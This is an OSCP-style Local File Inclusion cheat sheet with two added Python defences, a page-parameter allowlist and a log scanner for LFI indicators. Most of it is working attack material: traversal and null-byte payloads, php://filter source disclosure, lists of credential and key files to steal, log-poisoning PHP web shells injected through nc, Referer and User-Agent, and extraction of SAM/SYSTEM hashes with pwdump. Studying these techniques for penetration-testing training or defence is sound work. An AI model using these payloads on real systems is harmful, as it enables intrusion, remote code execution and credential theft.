OSCP
LFI
In this example the user could just enter this string and retrieve the /etc/passwd file:
http://example.com/page=../../../../../../etc/passwd

Bypassing the added .php and other extra file-endings

It is common for the PHP code to append the file extension itself. Here is how that looks:
$file = $_GET['page'];
require($file . ".php");
Because ".php" is appended to the filename, the file we are looking for will not be found: /etc/passwd.php does not exist. However, if we add a null byte to the end of our attack string, the ".php" is no longer taken into account. So we add %00 to the end of our attack string:
http://example.com/page=../../../../../../etc/passwd%00

Bypassing php-execution

So if you have an LFI you can easily read .txt files but not .php files, because the web server executes them: their file ending says they contain code. This can be bypassed with the built-in php://filter stream wrapper, which returns the source base64-encoded instead of executing it:
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index
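The three tricks above (plain traversal, the %00 truncation and the php://filter wrapper) all succeed because `require($file . ".php")` trusts whatever arrives in `page`. As an added example that is not part of the original notes, here is the same lookup written in Python on the safe side: it decodes the parameter the way `$_GET` does, refuses NUL bytes, stream-wrapper prefixes and path separators, and only then appends `.php` to a name taken from an allowlist. `PAGES_DIR` and `ALLOWED_PAGES` are assumptions for the example. (The %00 truncation itself only works against PHP older than 5.3.4, which rejects paths containing a NUL byte; an allowlist makes the PHP version irrelevant.)

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumptions (not from the notes): where the includable pages live and which
# page names the application actually offers. A Linux web root is assumed,
# hence posixpath rather than os.path.
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = frozenset({"index", "about", "contact"})


def classify_page_param(raw: str) -> str:
    """Explain why a ?page= value is rejected, or return "ok".

    The value is URL-decoded first, exactly as PHP does for $_GET, so an
    encoded %00 or %2e%2e%2f is judged on what it decodes to.
    """
    page = unquote(raw)
    if "\x00" in page:
        return "null byte"          # the %00 truncation trick
    if "://" in page:
        return "stream wrapper"     # php://filter, data://, expect:// ...
    if "/" in page or "\\" in page or ".." in page:
        return "path traversal"     # ../../../../etc/passwd and friends
    if page not in ALLOWED_PAGES:
        return "not allowlisted"    # unknown but otherwise harmless name
    return "ok"


def resolve_page(raw: str) -> Optional[str]:
    """Return the absolute path that require() may load, or None to refuse.

    Mirrors require($file . ".php"), but with the allowlist in front of it.
    """
    if classify_page_param(raw) != "ok":
        return None
    candidate = posixpath.normpath(
        posixpath.join(PAGES_DIR, unquote(raw) + ".php"))
    # Defence in depth: after normalisation the file must still sit directly
    # inside PAGES_DIR; anything else means a check above was bypassed.
    if posixpath.dirname(candidate) != posixpath.normpath(PAGES_DIR):
        return None
    return candidate


if __name__ == "__main__":
    # The attack strings from the notes above, plus one legitimate request.
    for value in ("index",
                  "../../../../../../etc/passwd",
                  "../../../../../../etc/passwd%00",
                  "php://filter/convert.base64-encode/resource=index"):
        print(f"{value!r}: {classify_page_param(value)} -> {resolve_page(value)}")
```

The order of the checks matters only for the reason reported; any failing check refuses the request. Logging the reason string is useful on the defending side, because a burst of "null byte" or "stream wrapper" rejections from one client is exactly the signature of someone working through this cheat sheet.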

Linux

Tricks

Download config-files in a nice style-format
If you read files straight in the browser the styling can become unbearable and really difficult to read. A way around it is to download the files from the terminal, but that won't work if a login is blocking it. So this is a great workaround:
# First we save the cookie
curl -s http://example.com/login.php -c cookiefile -d "user=admin&pass=admin"
# Then we reuse the saved cookie for the LFI request (quoted so the shell does not treat ? as a glob)
curl -s 'http://example.com/gallery.php?page=/etc/passwd' -b cookiefile

Sensitive files

This is the default layout of important Apache files: https://wiki.apache.org/httpd/DistrosDefaultLayout
/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd
/etc/group
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
$USER/.bash_history or .profile
/root/.bash_history or .profile

/etc/mtab
/etc/inetd.conf
/var/log/dmessage
Web server files
# Usually found in the root of the website
.htaccess
config.php
SSH
authorized_keys
id_rsa
id_rsa.keystore
id_rsa.pub
known_hosts
Logs
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
User-specific files
Found in the home directory:
.bash_history
.mysql_history
.my.cnf

LFI to shell

Under the right circumstances you might be able to get a shell from an LFI.

Log poisoning

There are some requirements: we need to be able to read log files. In this example we are going to poison the Apache log file. You can use either the access log or the error log.
So once you have found an LFI vulnerability you have to inject PHP code into the log file and then execute it.
Insert PHP code into the log file
This can be done with nc or telnet. The request line is written to the access log as-is:
nc ip 80
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: ip
Connection: close
You can also add it to the error log by making a request to a page that doesn't exist:
nc ip 80
GET /AAAAAA<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: ip
Connection: close
Or in the Referer header:
GET / HTTP/1.1
Referer: <? passthru($_GET[cmd]) ?>
Host: ip
Connection: close
Execute it in the browser
Now you can request the log file through the LFI and see the PHP code get executed:
http://ip/index.php?page=../../../../../var/log/apache2/access.log&cmd=id

Proc files

If you can read the proc files on the system you might be able to poison them through the User-Agent header: the request's environment, including the User-Agent, is exposed in /proc/self/environ, so code placed in the User-Agent can be injected that way as well.
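Every technique in this "LFI to shell" section leaves a trace in the very logs it abuses: the poisoning request, the later include of the log file or of /proc/self/environ, and the wrapper or null-byte reads from earlier on the page. As an added example that is not part of the original notes, here is a Python scanner for Apache combined-format logs that tags those indicators per request line, Referer and User-Agent, and counts flagged lines per client address for triage. The log lines are constructed for the example (not real traffic), and the field names and regular expressions are assumptions; tune them to the real log format before relying on them.

```python
import re
from collections import Counter
from typing import Dict, List

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators drawn from the techniques described above. Each one is checked
# against the request line, the Referer and the User-Agent separately, because
# the poisoning payload can arrive in any of the three.
INDICATORS = [
    ("traversal", re.compile(r"\.\./|\.\.\\|%2e%2e(%2f|/)", re.I)),
    ("null-byte", re.compile(r"%00|\x00")),
    ("php-wrapper", re.compile(r"\b(php|data|expect|phar)://", re.I)),
    ("php-tag", re.compile(r"<\?(php\b|\s|=)", re.I)),
    ("proc-environ", re.compile(r"/proc/self/environ", re.I)),
    ("log-file-include", re.compile(r"(access|error)[._]log", re.I)),
]


def scan_line(line: str) -> List[str]:
    """Return "field:indicator" tags for one log line (empty list = clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    tags = []
    for field in ("req", "ref", "ua"):
        value = m.group(field)
        for name, rx in INDICATORS:
            if rx.search(value):
                tags.append(f"{field}:{name}")
    return tags


def scan_log(lines: List[str]) -> List[List[str]]:
    """Tag every line; the result is index-aligned with the input."""
    return [scan_line(line) for line in lines]


def flagged_sources(lines: List[str]) -> Dict[str, int]:
    """Count flagged lines per client address, for triage."""
    counts: Counter = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and scan_line(line):
            counts[m.group("ip")] += 1
    return dict(counts)


# Constructed sample log: one benign request, then the trail the techniques on
# this page would leave: a null-byte traversal read, the log-poisoning write,
# the include of the poisoned log, a php://filter source read, and a
# /proc/self/environ read with the payload carried in the User-Agent.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=../../../../../../etc/passwd%00 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:56:30 +0000] "GET /<?php passthru($_GET[\'cmd\']); ?> HTTP/1.1" 404 221 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:57:02 +0000] "GET /index.php?page=../../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Oct/2023:13:57:40 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:58:11 +0000] "GET /index.php?page=../../../../proc/self/environ HTTP/1.1" 200 700 "-" "<?php passthru($_GET[\'cmd\']); ?>"',
]

if __name__ == "__main__":
    for line, tags in zip(SAMPLE_LOG, scan_log(SAMPLE_LOG)):
        print(tags or "clean", "<-", line.split('"')[1])
    print(flagged_sources(SAMPLE_LOG))
```

A single "php-tag" hit on a 404 is the poisoning write and is harmless on its own; the line to page on is the later "traversal" plus "log-file-include" (or "proc-environ") request from the same address, which is the moment the planted code is executed. Keeping the scanner's output keyed by client address makes that pairing easy to see.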

Windows

Fingerprinting
c:\WINDOWS\system32\eula.txt
c:\boot.ini
c:\WINDOWS\win.ini
c:\WINNT\win.ini
c:\WINDOWS\Repair\SAM
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
c:\php\php.ini
c:\php5\php.ini
c:\php4\php.ini
c:\apache\php\php.ini
c:\xampp\apache\bin\php.ini
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
Logs
Common paths for Apache log files on Windows:
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
PHP session locations
c:\WINDOWS\TEMP\
c:\php\sessions\
c:\php5\sessions\
c:\php4\sessions\
Retrieving password hashes
In order to retrieve the system's password hashes we need two files: SYSTEM and SAM. Once you have those two files you can extract the hashes using the Kali tool pwdump, like this:
pwdump systemfile samfile
The SYSTEM and SAM files can be found in different locations, so try them all. Through a web server the path might be case-sensitive, even though it is Windows, so consider that!
Systemroot is usually windows
windows\repair\SAM
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM

%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

References:

This is the definitive guide to Local File Inclusion: https://highon.coffee/blog/lfi-cheat-sheet/